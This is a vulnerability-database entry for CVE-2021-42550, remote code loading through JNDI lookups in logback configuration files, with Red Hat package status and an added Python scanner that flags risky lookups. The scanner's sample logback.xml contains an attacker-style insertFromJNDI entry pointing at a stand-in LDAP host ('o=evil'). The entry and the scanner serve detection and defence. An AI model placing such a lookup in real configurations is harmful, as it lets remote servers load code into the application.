exploitDog

CVE-2021-42550

Published: 16 Dec 2021
Source: redhat
CVSS3: 6.6
EPSS: Low

Description

In logback version 1.2.7 and prior versions, an attacker with the privileges required to edit configuration files could craft a malicious configuration allowing execution of arbitrary code loaded from LDAP servers.

A flaw was found in the logback package. When using a specially-crafted configuration, this issue could allow a remote authenticated attacker to execute arbitrary code loaded from LDAP servers.
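The description states the mechanism only at a high level. Concretely, logback's Joran configurator honours an <insertFromJNDI env-entry-name="..." as="..."/> element in logback.xml and resolves the name through javax.naming, so on 1.2.7 and earlier a name such as ldap://host/obj is handed to an LDAP server, which can return an object, and with it code, to the JVM. Two preconditions follow from the text: the attacker must be able to write the configuration file, and the host must be able to reach the attacker's directory server. The scanner below is an added example, not code from logback, Red Hat or exploitDog. It parses a constructed logback.xml, reports every insertFromJNDI whose env-entry-name does not stay inside the local java: namespace, and checks a reported version against the 1.2.7 ceiling the advisory gives. The java: prefix rule, the SAMPLE_CONFIG contents and the is_affected_version helper are this example's own choices, not a description of the exact upstream patch.

```python
"""Flag logback configuration files whose JNDI lookups leave the local
java: namespace, the pattern behind CVE-2021-42550 (added example)."""
import re
import xml.etree.ElementTree as ET

# Constructed sample logback.xml: one legitimate container lookup and one
# attacker-style lookup pointing at a remote LDAP server.
SAMPLE_CONFIG = """<configuration>
  <insertFromJNDI env-entry-name="java:comp/env/appName" as="appName"/>
  <insertFromJNDI env-entry-name="ldap://directory.example.test:1389/o=evil"
                  as="hostTag" scope="context"/>
  <appender name="STDOUT" class="ch.qos.logback.core.ConsoleAppender">
    <encoder><pattern>%d ${appName} ${hostTag} %msg%n</pattern></encoder>
  </appender>
  <root level="INFO"><appender-ref ref="STDOUT"/></root>
</configuration>
"""

# Only names inside the local JNDI tree are treated as safe by this scanner;
# everything else (ldap://, rmi://, iiop://, bare names resolved through an
# externally configured InitialContext) is reported. This is the scanner's
# rule, not a quote of the upstream fix.
SAFE_PREFIX = "java:"

# Advisory text: "logback version 1.2.7 and prior versions".
LAST_AFFECTED = (1, 2, 7)


def jndi_lookups(config_xml: str) -> list[tuple[str, str]]:
    """Return (env-entry-name, as) pairs for every <insertFromJNDI> element."""
    # The element can sit at any depth (for example inside included
    # fragments), so walk the whole tree rather than only direct children.
    # ElementTree is fine for a file you already control; use defusedxml
    # when scanning configuration you did not write yourself.
    root = ET.fromstring(config_xml)
    return [
        (el.get("env-entry-name", "").strip(), el.get("as", "").strip())
        for el in root.iter("insertFromJNDI")
    ]


def is_remote_lookup(env_entry_name: str) -> bool:
    """True when the lookup name is not anchored in the java: namespace."""
    return not env_entry_name.startswith(SAFE_PREFIX)


def scan_config(config_xml: str) -> list[dict[str, str]]:
    """Return one finding per JNDI lookup that may resolve outside the JVM."""
    findings = []
    for name, alias in jndi_lookups(config_xml):
        if is_remote_lookup(name):
            scheme = name.split(":", 1)[0].lower() if ":" in name else "(none)"
            findings.append({
                "env_entry_name": name,
                "property": alias,
                "scheme": scheme,
                "note": "JNDI lookup outside the java: namespace; on logback "
                        "<= 1.2.7 this can load an object, and code, from a "
                        "remote naming service",
            })
    return findings


def is_affected_version(version: str) -> bool:
    """Compare a logback version string against the advisory's 1.2.7 ceiling.

    Only numeric components are compared, so 1.3.0 pre-releases come back as
    not affected; the advisory text does not cover them and they need a
    separate check against the upstream release notes.
    """
    parts = tuple(int(p) for p in re.findall(r"\d+", version)[:3])
    return parts <= LAST_AFFECTED


if __name__ == "__main__":
    for finding in scan_config(SAMPLE_CONFIG):
        print(f"[{finding['scheme']}] {finding['env_entry_name']} "
              f"-> ${{{finding['property']}}}")
        print("   ", finding["note"])
    for v in ("1.2.7", "1.2.9"):
        print(v, "affected" if is_affected_version(v) else "not affected")
```

Run against a real deployment, the useful signal is any finding at all: a logback.xml that never uses insertFromJNDI cannot trigger this path regardless of version, while a flagged lookup on an affected version is worth treating as an incident if the file's modification time or ownership does not match your deployment pipeline.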

Statement

Red Hat Satellite shipped affected versions, however, it is not vulnerable because the product doesn't meet the conditions needed to perform the attack.

Affected packages

Platform | Package | State | Advisory | Release date (YYYY-MM-DD)
Red Hat BPM Suite 6 | logback-classic | Out of support scope | | 
Red Hat Integration Camel K 1 | logback-classic | Affected | | 
Red Hat Integration Camel Quarkus 1 | logback-classic | Not affected | | 
Red Hat JBoss BRMS 6 | logback-classic | Out of support scope | | 
Red Hat JBoss Fuse 6 | logback-classic | Out of support scope | | 
Red Hat Fuse 7.11 | logback-classic | Fixed | RHSA-2022:5532 | 2022-07-07
Red Hat Satellite 6.11 for RHEL 7 | candlepin | Fixed | RHSA-2022:5498 | 2022-07-05
Red Hat Satellite 6.11 for RHEL 8 | candlepin | Fixed | RHSA-2022:5498 | 2022-07-05
RHDM 7.12.1 | logback-classic | Fixed | RHSA-2022:1110 | 2022-03-29
RHPAM 7.12.1 | logback-classic | Fixed | RHSA-2022:1108 | 2022-03-29


Additional information

Severity (Red Hat impact rating): Moderate
Weakness: CWE-502 (Deserialization of Untrusted Data)
Bug: https://bugzilla.redhat.com/show_bug.cgi?id=2033560
Title: logback: remote code execution through JNDI call from within its configuration file

EPSS: 0.02604 (percentile 85%), Low
CVSS3: 6.6, Medium

Related entries

CVSS3: 6.6 | ubuntu | about 4 years ago
In logback version 1.2.7 and prior versions, an attacker with the privileges required to edit configuration files could craft a malicious configuration allowing execution of arbitrary code loaded from LDAP servers.

CVSS3: 6.6 | nvd | about 4 years ago
In logback version 1.2.7 and prior versions, an attacker with the privileges required to edit configuration files could craft a malicious configuration allowing execution of arbitrary code loaded from LDAP servers.

CVSS3: 6.6 | debian | about 4 years ago
In logback version 1.2.7 and prior versions, an attacker with the requ ...

suse-cvrf | almost 3 years ago
Security update for maven and recommended update for antlr3, minlog, sbt, xmvn

CVSS3: 6.6 | github | about 4 years ago
Deserialization of Untrusted Data in logback
